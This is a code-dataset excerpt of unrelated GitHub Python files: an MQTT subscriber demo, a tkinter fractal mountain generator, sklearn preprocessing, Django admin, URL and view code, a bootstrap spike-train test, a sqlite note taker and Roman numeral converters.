print(max_subsequence([1,3,2,2,5,2,3,7]))","repo_name":"jerome-yutai-shen/leetcode_challenges","sub_path":"longest_subsequence.py","file_name":"longest_subsequence.py","file_ext":"py","file_size_in_byte":440,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"16604190957","text":"import wavemqtt\n\n# config information\nSMARTCITIES_NAMESPACE = 'GyAHBqhwQ9hEYEYArz0vUhHsUmMT6NC9TdoA2mhH5-DGoA=='\n\n# also serves as subscribe topic\na_uuid = \"8607a83a-b7a2-11e8-8755-0cc47a0f7eea\"\n\n### SUBSCRIBER\ndef b_cb(client, ud, msg):\n print('b got', msg.topic, msg.payload)\nb = wavemqtt.Client(\"b\", on_message=b_cb)\nprint(\"entity is\", b.b64hash)\n\nb.subscribe(SMARTCITIES_NAMESPACE, a_uuid)\n\n# block and wait for data\nimport time\nwhile True:\n time.sleep(1)\n","repo_name":"conix-center/smart-cities-demo","sub_path":"wave/mqtt-client/python/examples/subscriber.py","file_name":"subscriber.py","file_ext":"py","file_size_in_byte":466,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"73231281522","text":"import random\r\nimport tkinter as tk\r\nimport time\r\n\r\n\r\n# 创建山脉生成器的类\r\nclass MountainGenerator:\r\n def __init__(self, canvas, interactive=False):\r\n self.canvas = canvas\r\n self.interactive = interactive\r\n self.points = [] # 存储山脉的点\r\n self.roughness = 0.25 # 初始粗糙度\r\n self.p0 = None # 未使用\r\n self.iterations = 3 # 初始迭代次数\r\n\r\n # 设置粗糙度\r\n def set_roughness(self, roughness):\r\n self.roughness = roughness\r\n\r\n # 设置迭代次数\r\n def set_iterations(self, iterations):\r\n self.iterations = iterations\r\n\r\n # 计算两点之间的中点,并对其进行位移\r\n def displace_point(self, p1, p2):\r\n # 从参数p1和p2中提取x1, y1和x2, y2的坐标\r\n x1, y1 = p1\r\n x2, y2 = p2\r\n\r\n # 计算两个点的中间x坐标\r\n x = (x1 + x2) / 2\r\n\r\n # 计算p1和p2之间的距离(欧几里德距离)\r\n length = ((x2 - x1) ** 2 + (y2 - y1) ** 2) ** 0.5\r\n\r\n # 如果x1和x2之间的距离小于等于1,返回p1(不进行位移)\r\n if abs(x1 - x2) <= 1:\r\n return p1\r\n\r\n # 否则,计算一个新的y坐标,通过在原始y坐标上添加一个随机的偏移值\r\n # 偏移值在 -self.roughness 和 self.roughness 之间随机选择\r\n new_y = y1 + length * random.uniform(-self.roughness, self.roughness)\r\n\r\n # 返回新的坐标点 (x, new_y)\r\n return x, new_y\r\n\r\n # 执行中点位移算法\r\n def midpoint_displacement(self, p1, p2, iterations):\r\n # 基本情况:如果迭代次数已经为0,返回起点p1和终点p2\r\n if iterations == 0:\r\n return [p1, p2]\r\n\r\n # 计算中点pc,通过调用displace_point函数对p1和p2之间的中点进行位移\r\n pc = self.displace_point(p1, p2)\r\n\r\n # 如果位移后的中点等于起点p1,表示不需要再细分,直接返回起点p1和终点p2\r\n if pc == p1:\r\n return [p1, p2]\r\n else:\r\n # 递归调用,将问题拆分为两个子问题:\r\n # 1. 从p1到位移后的中点pc进行细分,迭代次数减一\r\n left_half = self.midpoint_displacement(p1, pc, iterations - 1)\r\n\r\n # 2. 从位移后的中点pc到p2进行细分,迭代次数减一\r\n right_half = self.midpoint_displacement(pc, p2, iterations - 1)\r\n\r\n # 返回两个子问题的结果连接起来,中间插入位移后的中点pc\r\n return left_half + [pc] + right_half\r\n\r\n # 交互式中点位移,用于可视化生成山脉的过程\r\n def interactive_midpoint_displacement(self, p1, p2, sleep=0.1):\r\n # 初始化一个点列表,开始时包含起点p1和终点p2\r\n self.points = [p1, p2]\r\n\r\n # 初始化标志变量flag为True,用于控制迭代循环\r\n flag = True\r\n\r\n # 在GUI上绘制初始线段,颜色为黑色\r\n self.canvas.create_line(self.points, fill=\"black\")\r\n\r\n # 更新GUI显示\r\n self.canvas.update()\r\n\r\n # 暂停一段时间,以便观察初始线段\r\n time.sleep(sleep)\r\n\r\n # 进入循环,不断进行中点位移并更新GUI显示\r\n while flag:\r\n # 复制当前点列表,以便在迭代中修改\r\n points_new = self.points.copy()\r\n\r\n # 对当前点列表中的每对相邻点进行中点位移操作\r\n for i in range(len(self.points) - 1):\r\n pc = self.displace_point(self.points[i], self.points[i + 1])\r\n\r\n # 如果位移后的中点pc等于当前点中的起点,表示不需要再细分,退出循环\r\n if pc == self.points[i]:\r\n flag = False\r\n continue\r\n\r\n # 更新新的点列表,将位移后的中点pc插入到适当的位置\r\n points_new = points_new[:i + 1] + [pc] + points_new[i + 1:]\r\n\r\n # 更新当前点列表为新的点列表\r\n self.points = points_new\r\n\r\n # 在GUI上绘制新的线段,颜色为黑色\r\n self.canvas.create_line(self.points, fill=\"black\")\r\n\r\n # 更新GUI显示\r\n self.canvas.update()\r\n\r\n # 暂停一段时间,以便观察迭代过程\r\n time.sleep(sleep)\r\n\r\n # 循环结束后,打印 \"Finished\" 表示生成过程完成\r\n print(\"Finished\")\r\n\r\n # 重置画布\r\n def reset_code(self):\r\n # 使用GUI画布的delete方法,删除所有在画布上的图形元素,\"all\"表示删除所有\r\n self.canvas.delete(\"all\")\r\n\r\n # 将对象的属性 self.points 重置为空列表,用于存储点坐标\r\n self.points = []\r\n\r\n # 生成山脉\r\n def build_mountains(self):\r\n # 重置画布和点列表\r\n self.reset_code()\r\n\r\n # 随机生成两个山峰的高度\r\n h1 = random.randint(100, 400)\r\n h2 = random.randint(100, 400)\r\n\r\n # 定义山峰的x坐标\r\n xh1 = 6\r\n xh2 = 994\r\n\r\n # 在画布上创建表示山峰的红色圆形点\r\n self.canvas.create_oval(xh2 - 3, h2 - 3, xh2 + 3, h2 + 3, fill=\"red\", outline='black')\r\n\r\n # 将山峰的坐标添加到点列表中\r\n self.points.append([xh1, h1])\r\n self.points.append([xh2, h2])\r\n\r\n # 根据是否交互模式,选择不同的方法生成山脉\r\n if self.interactive:\r\n # 在交互模式下,使用 interactive_midpoint_displacement 方法生成山脉\r\n self.interactive_midpoint_displacement(self.points[0], self.points[1])\r\n else:\r\n # 在非交互模式下,使用 midpoint_displacement 方法生成山脉\r\n self.points = self.midpoint_displacement(self.points[0], self.points[1], self.iterations)\r\n for i in range(len(self.points) - 1):\r\n # 在画布上绘制连接点的线段\r\n self.canvas.create_line(self.points[i][0], self.points[i][1], self.points[i + 1][0],\r\n self.points[i + 1][1])\r\n\r\n\r\nif __name__ == \"__main__\":\r\n root = tk.Tk()\r\n root.title(\"Mountain Generator\")\r\n\r\n canvas = tk.Canvas(root, width=1000, height=600)\r\n canvas.pack()\r\n\r\n generator = MountainGenerator(canvas, interactive=True) # 设置 interactive 为 False 以使用非交互模式\r\n\r\n # 创建生成山脉按钮\r\n btn_generate = tk.Button(root, text=\"生成山脉\", command=generator.build_mountains)\r\n btn_generate.pack(side=\"right\")\r\n\r\n # 创建重置画布按钮\r\n btn_reset = tk.Button(root, text=\"重置画布\", command=generator.reset_code)\r\n btn_reset.pack(side=\"right\")\r\n\r\n r = tk.DoubleVar()\r\n r.set(0.4)\r\n\r\n label = tk.Label(root, text=\"粗糙度: 0.25\")\r\n label.pack(side=\"left\")\r\n\r\n # 创建粗糙度调节滑块\r\n scale = tk.Scale(root, from_=0, to=1.0, resolution=0.01, orient=\"horizontal\", variable=r)\r\n scale.pack(side=\"left\")\r\n\r\n # 迭代次数输入框\r\n iterations_label = tk.Label(root, text=\"迭代次数:\")\r\n iterations_label.pack(side=\"left\")\r\n iterations_entry = tk.Entry(root)\r\n iterations_entry.pack(side=\"left\")\r\n iterations_entry.insert(0, \"3\") # 设置默认迭代次数\r\n\r\n\r\n # 确认按钮,用于设置迭代次数\r\n def set_iterations():\r\n try:\r\n iterations = int(iterations_entry.get())\r\n generator.set_iterations(iterations)\r\n except ValueError:\r\n pass\r\n\r\n\r\n # 确认按钮\r\n iterations_button = tk.Button(root, text=\"确认\", command=set_iterations)\r\n iterations_button.pack(side=\"left\")\r\n\r\n root.mainloop()\r\n","repo_name":"Dengchunwei001/Task5","sub_path":"lab5.py","file_name":"lab5.py","file_ext":"py","file_size_in_byte":7720,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"26279381282","text":"import pandas as pd\nfrom sklearn.compose import ColumnTransformer\n# from sklearn.decomposition import PCA\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.impute import SimpleImputer\nfrom sklearn.preprocessing import StandardScaler, OneHotEncoder\nfrom sklearn.compose import make_column_selector as selector\n\n\ndef no_string_cols(df):\n '''REMOVING STRING COLUMNS'''\n cols_to_remove = []\n\n for col in df.columns:\n try:\n _ = df[col].astype(float)\n except ValueError:\n print('Couldn\\'t convert %s to float' % col)\n cols_to_remove.append(col)\n pass\n\n # keep only the columns in df that do not contain string\n df = df[[col for col in df.columns if col not in cols_to_remove]]\n return df\n\n\ndef data_extract(csv_path):\n '''DATA EXTRACTION'''\n df = pd.read_csv(csv_path)\n\n # df = df.dropna(axis=1, thresh=len(df.values)/1.5) # dropping columns where 1/3 is Nan or more)\n # df = df.fillna(df.mean()) # imputing missing numerical values with feature means\n # df = df.drop(1379) # df[1379]['Electrical'] is the only empty string in the column\n\n X = df.drop(['Id'], axis=1)\n # X = X.drop(ordinal_columns_str, axis=1)\n y = None\n\n if csv_path == '../HousePrices/tests/train.csv':\n X = X.drop(['SalePrice'], axis=1)\n y = df['SalePrice']\n\n return X, y\n\n\ndef data_preprocessor():\n '''NUMERIC AND CATEGORICAL VALUES HANDLING (EXCEPT ORDINAL - DONE SEPARATELY)'''\n numeric_transformer = Pipeline(steps=[\n ('imputer', SimpleImputer(strategy='median')),\n ('scaler', StandardScaler()),\n # (\"pca\", PCA(n_components=6))\n ])\n\n '''HANDLING CATEGORICAL DATA'''\n categorical_transformer = Pipeline(steps=[\n ('imputer', SimpleImputer(strategy='most_frequent')),\n ('onehot', OneHotEncoder(categories='auto', drop='first'))\n ])\n\n '''OVERALL PREPROCESSING - COLUMN TRANSFORMATION'''\n preprocessor = ColumnTransformer(transformers=[\n ('num', numeric_transformer, selector(dtype_exclude=object)),\n ('cat', categorical_transformer, selector(dtype_include=object))\n ])\n\n return preprocessor\n","repo_name":"AndreyGates/HousePrices","sub_path":"src/houseprices/data_prep.py","file_name":"data_prep.py","file_ext":"py","file_size_in_byte":2156,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"40995244252","text":"from django.contrib import admin\nfrom django.core.exceptions import ValidationError\nfrom django.forms import BaseInlineFormSet\n\nfrom .models import Article, Tabel, Scope\n\n@admin.register(Scope)\nclass ScopeAdmin(admin.ModelAdmin):\n pass\n\nclass TableInlineFormset(BaseInlineFormSet):\n\n def clean(self):\n super(TableInlineFormset, self).clean()\n total_checked = 0\n for form in self.forms:\n if not form.is_valid():\n return\n if form.cleaned_data and not form.cleaned_data.get('DELETE'):\n if form.cleaned_data['is_main']:\n total_checked += 1\n if total_checked > 1:\n raise ValidationError('У же есть один основной раздел, выебирте один!')\n\n if total_checked < 1:\n raise ValidationError(\"Вам необходимо выбрать один основной раздел!\")\n\n return super().clean() # вызываем базовый код переопределяемого метода\n\n\nclass TableInline(admin.TabularInline):\n model = Tabel\n formset = TableInlineFormset\n\n\nclass ArticleAdmin(admin.ModelAdmin):\n\n inlines = [\n TableInline\n ]\n\nadmin.site.register(Article, ArticleAdmin)\n","repo_name":"Shatilov789/django_m2m","sub_path":"articles/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":1282,"program_lang":"python","lang":"ru","doc_type":"code","stars":7,"dataset":"github-code","pt":"75"} +{"seq_id":"74036868722","text":"from csv_app.models import (Dataschema, \n\t\t\t\t\t\t\tColumn, \n\t\t\t\t\t\t\tTypestatus, \n\t\t\t\t\t\t\tTypetime, \n\t\t\t\t\t\t\tTypescore, \n\t\t\t\t\t\t\tUser,\n\t\t\t\t\t\t\tContentType)\n\ndef get_filters_dict(dict_request):\n\t# delete pairs of key value from request.QueryDict\n\t# to pass new dict to save it in DB\n\tdeleted_keys = [ \"name\",\n\t\t\t\t\t \"column_separator\",\n\t\t\t\t\t \"string_cherecter\",\n\t\t\t\t\t \"csrfmiddlewaretoken\"]\n\treturn {key:value for (key, value) in dict_request.items() \\\n\t\t\tif key not in deleted_keys}\n\ndef save_filters(dict_request, user_name, name_schema):\n\t'''\n\tsave filters to db\n\t'''\n\t# key patterns for dict_request\n\t# STATE ROW CONST\n\tSTATE_SELECT = \"name_select_state_1\"\n\t# TIME ROW CONST\n\tTIME_SELECT = \"match_type_\"\n\tTIME_INPUT_FROM = \"time_name_from_\"\n\tTIME_INPUT_TO = \"time_name_to_\"\n\t# STATE ROW CONST\n\tSCORE_SELECT = \"score_type_select_\"\n\tSCORE_COMPAIR = \"compair_\"\n\t# total, home, guest consts\n\tSCORE_INPUT_VALUE = \"score_input_name_\"\n\t# compairson consts\n\tSCORE_INPUT_HOME = \"score_name_home_\"\n\tSCORE_INPUT_GUEST = \"score_name_guest_\"\n\t#COLUMN NAMES\n\tINIT = 'Select matches '\n\t#time dict\n\tTIME_NAME = {\n\t\t'n': \"Filter from matches now from valfrom to valto\",\n\t\t't': \"Filter matches from time table from valfrom to valto\"\n\t}\n\t# score name dicts\n\tSCORE_NAME_COMMON = \"Filter all mathes where \"\n\t# create init Col which is parent for otherone\n\t# get Userprofile inst\n\tuserprofile = User.objects.get(username=user_name).userprofile\n\t# get Schema\n\tDATA_SCHEMA = \\\n\t\tDataschema.objects.filter(profile=userprofile).get(name=name_schema)\n\t# create Typestatus row\n\t# get value from dict_request\n\tcol_type_item = dict_request.pop(STATE_SELECT)\n\ttype_status_obj = Typestatus.objects.create(matchestate=col_type_item)\n\t# set name. Typestatus.STATES has all avliable names\n\tname = f'{INIT}{dict(Typestatus.STATES).get(col_type_item)}'\n\tcolumn_obj = Column.objects.create(\n\t\tlogicoperator = 'and',\n\t\tname = name,\n\t\torder = \"1\",\n\t\tdataschema = DATA_SCHEMA,\n\t\tcontent_object=type_status_obj\n\t\t)\n\t# init list with orders\n\tsaved_parent_order_list = [(1,)]\n\tis_list_not_empty = True\n\t# this while goes throught orders to append +1 to last element in the order\n\twhile is_list_not_empty:\n\t\t#extract first element\n\t\torder = saved_parent_order_list.pop(0)\n\t\t# get column to set it as parent for next col if exists\n\t\tparent_obj = DATA_SCHEMA.related_column.get(order=\\\n\t\t\t\t\t\t\t\t\t\t\t\"_\".join((str(i) for i in order)))\n\t\t#add '1' to end of typle\n\t\torder = list(order) + [1]\n\t\tis_next = True\n\t\t# this while goes throw orders to add +1 to last element in the order\n\t\twhile is_next:\n\t\t\tno_error = True\n\t\t\tstr_order = \"_\".join((str(i) for i in order))\n\t\t\t# try parse Typetime\n\t\t\ttry:\n\t\t\t\ttime_type = dict_request.pop(f'{TIME_SELECT}{str_order}')\n\t\t\t\ttime_from = dict_request.pop(f'{TIME_INPUT_FROM}{str_order}')\n\t\t\t\ttime_to = dict_request.pop(f'{TIME_INPUT_TO}{str_order}')\n\t\t\t\ttype_obj = Typetime.objects.create(\n\t\t\t\t\tmatch_status = time_type,\n\t\t\t\t\tvalfrom = str(time_from),\n\t\t\t\t\tvalto = str(time_to))\n\t\t\t\t# define name for new Col obj\n\t\t\t\tname = TIME_NAME.get(time_type)\n\t\t\t\tname = name.replace(\"valfrom\", time_from)\n\t\t\t\tname = name.replace(\"valto\", time_to)\n\t\t\texcept KeyError:\n\t\t\t\t# else try parse Typescore\n\t\t\t\ttry:\n\t\t\t\t\tscore_type = dict_request.pop(f'{SCORE_SELECT}{str_order}')\n\t\t\t\t\t# filter_name = dict_request.pop(f'{SCORE_SELECT}{str_order}')\n\t\t\t\t\tscore_compair = \\\n\t\t\t\t\t\tdict_request.pop(f'{SCORE_COMPAIR}{str_order}')\n\t\t\t\t\tval_score, val_first, val_second = False, False, False\n\t\t\t\t\tif dict_request.get(f'{SCORE_INPUT_VALUE}{str_order}'):\n\t\t\t\t\t\tval_score = \\\n\t\t\t\t\t\t\tdict_request.pop(f'{SCORE_INPUT_VALUE}{str_order}')\n\t\t\t\t\t\ttail_score_name = dict(Typescore.TOTAL).get(score_type)+\\\n\t\t\t\t\t\t\t\t\t\t'score ' + score_compair + val_score\n\t\t\t\t\telse:\n\t\t\t\t\t\tval_first = \\\n\t\t\t\t\t\t\tdict_request.pop(f'{SCORE_INPUT_HOME}{str_order}')\n\t\t\t\t\t\tval_second = \\\n\t\t\t\t\t\t\tdict_request.pop(f'{SCORE_INPUT_GUEST}{str_order}')\n\t\t\t\t\t\ttail_score_name = ' home score ' + val_first + score_compair +\\\n\t\t\t\t\t\t\t\t\t\t' guest score ' + val_second\n\t\t\t\t\tname = f'{SCORE_NAME_COMMON}{tail_score_name}'\n\t\t\t\t\t# create Typescore onj\n\t\t\t\t\ttype_obj = Typescore.objects.create(\n\t\t\t\t\t\t\tscore = score_type,\n\t\t\t\t\t\t\tcomparison = score_compair,\n\t\t\t\t\t\t\tvalfirst = \\\n\t\t\t\t\t\t\t\tint(val_score) \\\n\t\t\t\t\t\t\t\tif score_type in ['t', 'h', 'g'] \\\n\t\t\t\t\t\t\t\telse int(val_first),\n\t\t\t\t\t\t\tvalsecond = val_second if score_type == 'c' else 0)\n\t\t\t\texcept KeyError:\n\t\t\t\t\tis_next, no_error = False, False\n\t\t\tif no_error:\n\t\t\t\tcl = Column.objects.create(\n\t\t\t\t\t\tlogicoperator='or',\n\t\t\t\t\t\tname=name,\n\t\t\t\t\t\torder=str_order,\n\t\t\t\t\t\tdataschema=DATA_SCHEMA,\n\t\t\t\t\t\tcontent_object=type_obj,\n\t\t\t\t\t\tparent=parent_obj\n\t\t\t\t\t\t)\n\t\t\t\t# add new order to saved_parent_order_list\n\t\t\t\tsaved_parent_order_list.append(tuple(order.copy()))\n\t\t\t\t# try to find next\n\t\t\t\torder[-1] = order[-1] + 1\n\t\t# check is list Empty\n\t\tis_list_not_empty = True if len(saved_parent_order_list) > 1 else False\n\n\n\n","repo_name":"citieslg/csv_parser","sub_path":"csv_app/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4859,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"3683012755","text":"from django.conf import settings\nfrom django.conf.urls.static import static\nfrom django.contrib import admin\nfrom django.urls import path, include\nimport os\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n path('profiles/', include('django.contrib.auth.urls')),\n path('profiles/', include('profiles.urls')),\n path('', include('site_layout.urls')),\n path('shop/', include('shop.urls')),\n path('workshop/', include('repairs_restorals.urls')),\n path('invoices/', include('invoices.urls')),\n]\n\nadmin.site.site_header = \"Goat and Daisy\"\nadmin.site.index_title = \"Antique Shop and Repairs Admin Panel\"\n\n# if AWS isn't being used...\nif not \"USE_AWS\" in os.environ:\n # ...and debug is True...\n if settings.DEBUG:\n # the media_url is set to MEDIA_ROOT in settings\n urlpatterns += static(settings.MEDIA_URL,\n document_root=settings.MEDIA_ROOT)\n","repo_name":"Mishalzeera/goat-and-daisy-antiques","sub_path":"goat_and_daisy/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":907,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"74592434803","text":"\nimport pdb\nimport sys\nimport argparse\nimport numpy as np\nimport plotly.graph_objects as go\nimport plotly.subplots\nsys.path.append(\"../src\")\nimport resampling\n\ndef main(argv):\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--nResamples\", \n help=\"number of resamples for bootstrap hypothesis test\",\n type=int,\n default=2000)\n parser.add_argument(\"--max_ISI_in_hist\", \n type=float,\n default=500)\n parser.add_argument(\"--max_ISI_to_plot\", \n type=float,\n default=150)\n parser.add_argument(\"--num_bins\", \n type=int,\n default=30)\n parser.add_argument(\"--data_filename\", \n help=\"data filename\",\n default=\"../../data/66A_int13_14.npz\")\n parser.add_argument(\"--fig_filename_pattern\", \n help=\"figure filename pattern\",\n default=\"../../figures/diffParamsInvGaussianModel_{:s}.{:s}\")\n args = parser.parse_args()\n\n nResamples = args.nResamples\n max_ISI_in_hist = args.max_ISI_in_hist\n max_ISI_to_plot = args.max_ISI_to_plot\n num_bins = args.num_bins\n data_filename = args.data_filename\n fig_filename_pattern = args.fig_filename_pattern\n\n load_res = np.load(data_filename, allow_pickle=True)\n female1_spike_times = load_res[\"Female1_2_spikes_times\"]\n female2_spike_times = load_res[\"Female2_2_spikes_times\"]\n\n female1_ISIs = np.diff(female1_spike_times)\n female1_ISIs[np.where(female1_ISIs==0)[0]] = 1.0 # fixing problem due to storing spike times in milliseconds\n female2_ISIs = np.diff(female2_spike_times)\n female2_ISIs[np.where(female2_ISIs==0)[0]] = 1.0 # fixing problem due to storing spike times in milliseconds\n\n all_ISIs = np.hstack((female1_ISIs, female2_ISIs))\n\n def difference_lambda(samples,\n Nfemale1=len(female1_ISIs),\n NFemale2=len(female2_ISIs)):\n female1_ISIs = samples[:Nfemale1]\n female2_ISIs = samples[Nfemale1:]\n female1_mu = female1_ISIs.mean()\n female1_lambda = 1/(1/female1_ISIs-1/female1_mu).mean()\n female2_mu = female2_ISIs.mean()\n female2_lambda = 1/(1/female2_ISIs-1/female2_mu).mean()\n lambda_diff = female1_lambda-female2_lambda\n return lambda_diff\n\n observed_difference_lambda = difference_lambda(samples=all_ISIs)\n null_hyp_samples_lambda = resampling.get_bootstrap_sample(\n sample=all_ISIs, statistic=difference_lambda, nResamples=nResamples)\n sign_lambda = resampling.compute_bootstrap_HT_sign(\n null_hyp_samples=null_hyp_samples_lambda,\n observed=observed_difference_lambda,\n two_sided=True)\n\n def difference_mu(samples,\n Nfemale1=len(female1_ISIs),\n NFemale2=len(female2_ISIs)):\n female1_ISIs = samples[:Nfemale1]\n female2_ISIs = samples[Nfemale1:]\n female1_mu = female1_ISIs.mean()\n female2_mu = female2_ISIs.mean()\n mu_diff = female1_mu-female2_mu\n return mu_diff\n\n observed_difference_mu = difference_mu(samples=all_ISIs)\n null_hyp_samples_mu = resampling.get_bootstrap_sample(\n sample=all_ISIs, statistic=difference_mu, nResamples=nResamples)\n sign_mu = resampling.compute_bootstrap_HT_sign(\n null_hyp_samples=null_hyp_samples_mu,\n observed=observed_difference_mu,\n two_sided=True)\n\n title = \"Significance (two-sided): {:.04f}\".format(sign_lambda)\n hist_trace = trace0 = go.Histogram(x=null_hyp_samples_lambda, nbinsx=num_bins, histnorm='probability')\n fig = go.Figure()\n fig.add_trace(hist_trace)\n fig.add_vline(x=observed_difference_lambda, line_dash=\"dash\")\n fig.update_layout(title=title)\n fig.update_xaxes(title_text=r\"$\\lambda$\")\n fig.update_yaxes(title_text=\"Probability\")\n\n html_fig_filename = fig_filename_pattern.format(\"lambda\", \"html\")\n png_fig_filename = fig_filename_pattern.format(\"lambda\", \"png\")\n fig.write_html(html_fig_filename)\n fig.write_image(png_fig_filename)\n\n fig.show()\n\n title = \"Significance (two-sided): {:.04f}\".format(sign_mu)\n hist_trace = trace0 = go.Histogram(x=null_hyp_samples_mu, nbinsx=num_bins, histnorm='probability')\n fig = go.Figure()\n fig.add_trace(hist_trace)\n fig.add_vline(x=observed_difference_mu, line_dash=\"dash\")\n fig.update_layout(title=title)\n fig.update_xaxes(title_text=r\"$\\mu$\")\n fig.update_yaxes(title_text=\"Probability\")\n\n html_fig_filename = fig_filename_pattern.format(\"mu\", \"html\")\n png_fig_filename = fig_filename_pattern.format(\"mu\", \"png\")\n fig.write_html(html_fig_filename)\n fig.write_image(png_fig_filename)\n\n fig.show()\n\n pdb.set_trace()\n\nif __name__==\"__main__\":\n main(sys.argv)\n","repo_name":"joacorapela/singleNeuronSpikesAnalysisTutorial","sub_path":"code/scripts/doTestDiffParamInvGaussianModels.py","file_name":"doTestDiffParamInvGaussianModels.py","file_ext":"py","file_size_in_byte":4904,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"75"} +{"seq_id":"14185014776","text":"from datetime import datetime\nimport sqlite3\nfrom sqlite3 import Error\nimport pathlib\n\ndef create_connection(db_file):\n conn = None\n try:\n conn = sqlite3.connect(db_file)\n except Error as e:\n print(e)\n return conn\n\ndef create_note(conn, note):\n sql = '''INSERT INTO notes(note_time, note_data) VALUES (?,?)'''\n cur = conn.cursor()\n cur.execute(sql, note)\n return cur.lastrowid\n\ndef main():\n note = input('Write:: ')\n current_path = pathlib.Path().absolute()\n database_path = str(current_path) + '/database.sqlite3'\n conn = create_connection(database_path)\n with conn:\n note_data = (str(datetime.now()), note)\n create_note(conn, note_data)\n\n\nif __name__=='__main__':\n main()\n","repo_name":"pieas-asif/mixedNotes","sub_path":"mixedNotes.py","file_name":"mixedNotes.py","file_ext":"py","file_size_in_byte":744,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"12468130504","text":"from django.contrib.auth.views import LoginView\nfrom django.shortcuts import redirect\nfrom django.urls import reverse_lazy\nfrom django.views.generic import CreateView\nfrom .forms import UserRegisterForm, UserLoginForm\nfrom django.contrib import messages\nfrom django.contrib.auth import login, logout\n\n\nclass RegisterUser(CreateView):\n form_class = UserRegisterForm\n template_name = 'users/register.html'\n success_url = reverse_lazy('login')\n\n def get_context_data(self, *, object_list=None, **kwargs):\n context = super().get_context_data(**kwargs)\n context['title'] = 'Регистрация'\n return context\n\n def form_valid(self, form):\n user = form.save()\n login(self.request, user)\n return redirect('home')\n\n\nclass LoginUser(LoginView):\n form_class = UserLoginForm\n template_name = 'users/login.html'\n\n def get_context_data(self, *, object_list=None, **kwargs):\n context = super().get_context_data(**kwargs)\n context['title'] = 'Авторизация'\n return context\n\n def get_success_url(self):\n return reverse_lazy('home')\n\n\ndef user_logout(request):\n logout(request)\n return redirect('users:login')\n","repo_name":"seroglazkinpavel/attestation","sub_path":"recipes/users/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1211,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"31961134812","text":"from datetime import datetime as time\n\nroman_list = {1: \"I\", 4: \"IV\", 5: \"V\", 9: \"IX\", 10: \"X\", 40: \"XL\", 50: \"L\", 90: \"XC\",\n 100: \"C\", 400: \"CD\", 500: \"D\", 900: \"CM\", 1000: \"M\"}\n\n\"\"\"\nA brute force method\n\"\"\"\n\n\ndef convert_roman(num, roman=\"\"):\n \"\"\"\n This function takes an integer input below 4000 and returns its Roman Numeral equivalent\n :param num: 1904\n :param roman: null\n :return: MCMIV\n \"\"\"\n if num - 1000 >= 0:\n count = num - 1000\n if count == 0:\n roman += roman_list.get(1000)\n else:\n for i in range(num // 1000):\n roman += roman_list.get(1000)\n return convert_roman(num % 1000, roman)\n elif num - 1000 < 0:\n if num in range(900, 1000):\n roman += \"CM\"\n return convert_roman(num % 100, roman)\n elif num > 500:\n count = num - 500\n roman += roman_list.get(500)\n for i in range(count // 100):\n roman += roman_list.get(100)\n return convert_roman(num % 100, roman)\n elif num == 500:\n roman += roman_list.get(500)\n elif num in range(400, 500):\n roman += \"CD\"\n return convert_roman(num % 100, roman)\n elif num > 100:\n for i in range(num // 100):\n roman += roman_list.get(100)\n return convert_roman(num % 10, roman)\n elif num == 100:\n roman += roman_list.get(100)\n return convert_roman(num % 10, roman)\n elif num > 50:\n count = num - 50\n roman += roman_list.get(50)\n for i in range(count // 10):\n roman += roman_list.get(10)\n return convert_roman(num % 10, roman)\n elif num == 50:\n roman += roman_list.get(50)\n elif num in range(40, 50):\n roman += \"XV\"\n return convert_roman(num % 10, roman)\n elif num > 10:\n for i in range(num // 10):\n roman += roman_list.get(10)\n return convert_roman(num % 10, roman)\n elif num == 10:\n roman += roman_list.get(10)\n return convert_roman(num % 10, roman)\n elif num > 5:\n count = num - 5\n roman += roman_list.get(5)\n for i in range(count // 10):\n roman += roman_list.get(1)\n elif num == 5:\n roman += roman_list.get(5)\n elif num == 4:\n roman += \"IV\"\n elif num > 1:\n for i in range(num):\n roman += roman_list.get(1)\n elif num == 1:\n roman += roman_list.get(1)\n else:\n pass\n return roman\n\n\n\"\"\"\nA different approach\n\"\"\"\n\n\ndef num_splitter(num):\n \"\"\"\n This function takes a number and splits it into component digits and then returns a dictionary of the digit and its\n position with the position as the key\n :param num: 3210\n :return: {1000:3, 100:2, 10:1, 1:0}\n \"\"\"\n num1 = [int(d) for d in str(num)]\n num_dict = {}\n length = len(num1)\n for i in num1:\n num_dict.update({10 ** (length - 1): i})\n length -= 1\n return num_dict\n\n\ndef roman_converter(num):\n \"\"\"\n This function converts the number to its roman numeral equivalent\n :param num: 1904\n :return: MCMIV\n \"\"\"\n if num < 4000:\n roman = \"\"\n num_dict = num_splitter(num)\n numbers = [key * num_dict[key] for key in num_dict]\n for number in numbers:\n if number > 1000:\n roman += roman_list.get(1000)\n for i in range((number - 1000) // 1000):\n roman += roman_list.get(1000)\n elif number in roman_list:\n roman += roman_list[number]\n else:\n place = 0\n for keys in roman_list:\n if keys > number:\n place = keys\n break\n if place < 10:\n if number > 5:\n roman += roman_list.get(5)\n for i in range(number - 5):\n roman += roman_list.get(1)\n else:\n for i in range(number):\n roman += roman_list.get(1)\n elif place < 100:\n if number > 50:\n roman += roman_list.get(50)\n for i in range((number - 50) // 10):\n roman += roman_list.get(10)\n else:\n for i in range(number // 10):\n roman += roman_list.get(10)\n elif place < 1000:\n if number > 500:\n roman += roman_list.get(500)\n for i in range((number - 500) // 100):\n roman += roman_list.get(100)\n else:\n for i in range(number // 100):\n roman += roman_list.get(100)\n return roman\n else:\n return \"We currently do not allow numbers larger than or 